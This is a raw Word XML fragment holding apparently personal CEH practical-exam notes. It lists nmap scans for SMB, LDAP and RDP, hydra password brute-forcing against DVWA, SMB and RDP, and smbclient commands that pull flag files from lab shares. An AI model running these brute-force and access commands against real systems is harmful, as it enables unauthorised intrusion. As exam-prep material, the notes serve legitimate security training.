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0C8F1D5F">
      <w:r w:rsidR="03750B42">
        <w:rPr/>
        <w:t>Scanning &amp; Enum Commands:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="79E6E835">
        <w:rPr/>
        <w:t>Domain admin name:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39523F06" w:rsidRDefault="39523F06" w14:paraId="191A0153" w14:textId="4A037DF2">
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="39523F06">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>FQDN:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t xml:space="preserve"> --script </w:t>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t>smb</w:t>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t>-discovery</w:t>
      </w:r>
      <w:r w:rsidR="17B3C229">
        <w:rPr/>
        <w:t xml:space="preserve"> –p 445 </w:t>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="33004068">
        <w:rPr/>
        <w:t>/24</w:t>
      </w:r>
      <w:r w:rsidR="6EB21F30">
        <w:rPr/>
        <w:t xml:space="preserve">(look for </w:t>
      </w:r>
      <w:r w:rsidR="6EB21F30">
        <w:rPr/>
        <w:t>fqdn</w:t>
      </w:r>
      <w:r w:rsidR="6EB21F30">
        <w:rPr/>
        <w:t xml:space="preserve"> mention)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="275AFBD1" w:rsidRDefault="275AFBD1" w14:paraId="319BF253" w14:textId="668DA299">
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="275AFBD1">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Mercury Services:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="200B097C">
        <w:rPr/>
        <w:t>nmap -</w:t>
      </w:r>
      <w:r w:rsidR="200B097C">
        <w:rPr/>
        <w:t>sV</w:t>
      </w:r>
      <w:r w:rsidR="200B097C">
        <w:rPr/>
        <w:t xml:space="preserve"> -p 25,80,110,143 &lt;</w:t>
      </w:r>
      <w:r w:rsidR="200B097C">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="200B097C">
        <w:rPr/>
        <w:t>-subnet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="200B097C" w:rsidRDefault="200B097C" w14:paraId="7FA25A3F" w14:textId="0B34893E">
      <w:r w:rsidR="200B097C">
        <w:rPr/>
        <w:t xml:space="preserve">Need to Perform the same scan on all three subnets </w:t>
      </w:r>
      <w:r w:rsidR="200B097C">
        <w:rPr/>
        <w:t>i.e.</w:t>
      </w:r>
      <w:r w:rsidR="200B097C">
        <w:rPr/>
        <w:t xml:space="preserve"> 10.10.1.0/24, 192.168.0.0/24, 172.20.0.0/24 --&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="74E33381" w:rsidP="5B4D83BD" w:rsidRDefault="74E33381" w14:paraId="3E793146" w14:textId="52E6B6FD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="74E33381">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Product Version of domain controller:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="14E99A86" w:rsidRDefault="14E99A86" w14:paraId="0E385CD8" w14:textId="4CE611E9">
      <w:r w:rsidR="14E99A86">
        <w:rPr/>
        <w:t>----1------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="664B1595">
        <w:rPr/>
        <w:t>ldap port -&gt; 389.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="664B1595" w:rsidRDefault="664B1595" w14:paraId="5B682FF9" w14:textId="466B61B1">
      <w:r w:rsidR="664B1595">
        <w:rPr/>
        <w:t>-&gt; nmap -p 389 -sV -iL targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="664B1595" w:rsidRDefault="664B1595" w14:paraId="00883588" w14:textId="31229D65">
      <w:r w:rsidR="664B1595">
        <w:rPr/>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>ldapsearch</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t xml:space="preserve"> -x -</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>h  389</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t xml:space="preserve"> 192.168.215.130 </w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>b "DC=</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>CEH,DC</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>=com"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B308485" w:rsidRDefault="1B308485" w14:paraId="09E69586" w14:textId="5CE85C7A">
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>ldapsearch</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t xml:space="preserve"> -x -</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>h  389</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t xml:space="preserve"> 192.168.215.130 -p </w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>389  -</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>b "DC=</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>CEH,DC</w:t>
      </w:r>
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>=com"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B308485" w:rsidRDefault="1B308485" w14:paraId="7402D4F6" w14:textId="3B0D491D">
      <w:r w:rsidR="1B308485">
        <w:rPr/>
        <w:t>----2-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E72538C" w:rsidRDefault="0E72538C" w14:paraId="64794F54" w14:textId="770B7B11">
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t xml:space="preserve"> --script </w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t>smb</w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t>-discovery -p 445 -T</w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t>4  192.168.215.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E72538C" w:rsidRDefault="0E72538C" w14:paraId="6DDD7038" w14:textId="5742B2ED">
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t xml:space="preserve">Example: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E72538C" w:rsidRDefault="0E72538C" w14:paraId="7BF59227" w14:textId="160CDA3C">
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t xml:space="preserve">OS: Windows Server 2022 Datacenter 20348 (Windows 10.0 Build 20348) then </w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t>ans</w:t>
      </w:r>
      <w:r w:rsidR="0E72538C">
        <w:rPr/>
        <w:t xml:space="preserve"> will be=&gt; 10.0.20348</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79E6E835" w:rsidRDefault="79E6E835" w14:paraId="16641D07" w14:textId="6BA191C5">
      <w:r w:rsidR="79E6E835">
        <w:rPr/>
        <w:t xml:space="preserve">Service running on specific </w:t>
      </w:r>
      <w:r w:rsidR="79E6E835">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="79E6E835">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79E6E835" w:rsidRDefault="79E6E835" w14:paraId="50275E6A" w14:textId="605FF765">
      <w:r w:rsidR="79E6E835">
        <w:rPr/>
        <w:t xml:space="preserve">Version of </w:t>
      </w:r>
      <w:r w:rsidR="79E6E835">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="79E6E835">
        <w:rPr/>
        <w:t xml:space="preserve"> running in specific range </w:t>
      </w:r>
      <w:r w:rsidR="05244EFE">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="6809755E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Least Severity:</w:t>
      </w:r>
      <w:r w:rsidR="6809755E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79E6E835" w:rsidRDefault="79E6E835" w14:paraId="129F61E1" w14:textId="74700546">
      <w:r w:rsidR="0A28FEC7">
        <w:rPr/>
        <w:t>Use openvas or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79E6E835" w:rsidRDefault="79E6E835" w14:paraId="55FABACD" w14:textId="02DB52F7">
      <w:r w:rsidR="6809755E">
        <w:rPr/>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="6809755E">
        <w:rPr/>
        <w:t xml:space="preserve"> –script vuln </w:t>
      </w:r>
      <w:r w:rsidR="6809755E">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="6809755E">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="6809755E">
        <w:rPr/>
        <w:t>acunetix</w:t>
      </w:r>
      <w:r w:rsidR="6809755E">
        <w:rPr/>
        <w:t>.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="10D3E2CC" w14:textId="5690087C"/>
    <w:p w:rsidR="5F00CC22" w:rsidP="5B4D83BD" w:rsidRDefault="5F00CC22" w14:paraId="234B1FDA" w14:textId="2306D7D2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="5F00CC22">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="358783F0">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hydra):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B4D83BD" w:rsidP="7D333612" w:rsidRDefault="5B4D83BD" w14:paraId="2AB22057" w14:textId="00B49536">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="4672A0E1">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>DVWA:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="17CFBB05">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>DVWA Login Bruteforce:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="17CFBB05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1. hydra -L username.txt -P pass.txt 127.0.0.1 -s 42001 http-post-form "/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:Username and/or password incorrect."</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B4D83BD" w:rsidP="7D333612" w:rsidRDefault="5B4D83BD" w14:paraId="768AA997" w14:textId="38162ACF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5B4D83BD" w:rsidP="5B4D83BD" w:rsidRDefault="5B4D83BD" w14:paraId="4D4AFEFE" w14:textId="3F60D8BB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1DFCB09C" w:rsidP="5B4D83BD" w:rsidRDefault="1DFCB09C" w14:paraId="76D9DCD5" w14:textId="2F163B7D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="1DFCB09C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Smb</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="1DFCB09C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79F68A92" w:rsidP="5B4D83BD" w:rsidRDefault="79F68A92" w14:paraId="7BB7E662" w14:textId="5E810C74">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="79F68A92">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; port 139 or 445</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="448A27B8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="1C15E477">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>hydra -t 1 -v -L username.txt -P pass.txt smb://192.168.215.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1C15E477" w:rsidP="5B4D83BD" w:rsidRDefault="1C15E477" w14:paraId="4969E205" w14:textId="6E309C75">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="1C15E477">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; hydra -t 1 -v -L username.txt -P </w:t>
      </w:r>
      <w:r w:rsidR="1C15E477">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>pass.txt  192.168.215.130</w:t>
      </w:r>
      <w:r w:rsidR="1C15E477">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1C15E477">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4026436F" w:rsidP="5B4D83BD" w:rsidRDefault="4026436F" w14:paraId="6CEE5231" w14:textId="38F3B7B6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; to </w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>checkfolders</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>smbmap</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidR="5A8B60A5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:r w:rsidR="6A7DC1F1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-H 192.168.215.130 (sca</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>directories.</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ex</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>cehtoo</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>&gt;users)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4026436F" w:rsidP="5B4D83BD" w:rsidRDefault="4026436F" w14:paraId="1309429C" w14:textId="59270E24">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4026436F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="753E0BEE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="753E0BEE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:r w:rsidR="753E0BEE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -U Test//192.168.215.130/users [ enter pass for Test then]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CE8E79B" w:rsidP="5B4D83BD" w:rsidRDefault="2CE8E79B" w14:paraId="73D108B6" w14:textId="26E05B97">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2CE8E79B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; or smbclient \\\\10.10.55.X\\share_name -U user%password123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="753E0BEE" w:rsidP="5B4D83BD" w:rsidRDefault="753E0BEE" w14:paraId="26CF7FD5" w14:textId="090D322F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="753E0BEE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="269F8EA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ls-&gt; cd-&gt; doc/desktop-&gt; get &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D998E4D" w:rsidP="5C5AA300" w:rsidRDefault="3D998E4D" w14:paraId="685BECD2" w14:textId="78AB5769">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3D998E4D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; get secret.txt ~/Desktop/falg2.txt or more secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B4D83BD" w:rsidP="5B4D83BD" w:rsidRDefault="5B4D83BD" w14:paraId="24E34CEE" w14:textId="68B8EA55">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="15CBF613" w:rsidP="5B4D83BD" w:rsidRDefault="15CBF613" w14:paraId="2ABB8797" w14:textId="2A0491C0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="15CBF613">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>RDP:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="5BB41252">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="5BB41252">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="5BB41252">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="5BB41252">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 3389 --open -</w:t>
      </w:r>
      <w:r w:rsidR="5BB41252">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:r w:rsidR="5BB41252">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.215.129/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="62683E51" w:rsidP="5B4D83BD" w:rsidRDefault="62683E51" w14:paraId="6E1EA07C" w14:textId="44689669">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="62683E51">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; hydra -t 1 -v -L username.txt -P pass.txt rdp://192.168.215.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="62683E51" w:rsidP="5B4D83BD" w:rsidRDefault="62683E51" w14:paraId="59BE36B3" w14:textId="42537830">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="62683E51">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; hydra -t 1 –v –l test -P pass.txt rdp://192.168.215.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="530CFA7D" w:rsidP="5B4D83BD" w:rsidRDefault="530CFA7D" w14:paraId="710BE467" w14:textId="1C0E82B7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="530CFA7D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; use </w:t>
      </w:r>
      <w:r w:rsidR="530CFA7D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>remmina</w:t>
      </w:r>
      <w:r w:rsidR="530CFA7D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to locate </w:t>
      </w:r>
      <w:r w:rsidR="530CFA7D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>hide.cfe</w:t>
      </w:r>
      <w:r w:rsidR="530CFA7D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="530CFA7D" w:rsidP="5B4D83BD" w:rsidRDefault="530CFA7D" w14:paraId="6C13F651" w14:textId="4D09663E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="530CFA7D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;login via ftp to get the file in parrot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="24DB3946" w:rsidP="40100644" w:rsidRDefault="24DB3946" w14:paraId="5ED05833" w14:textId="5E662E03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24DB3946">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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or, </w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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xfreerdp</w:t>
      </w:r>
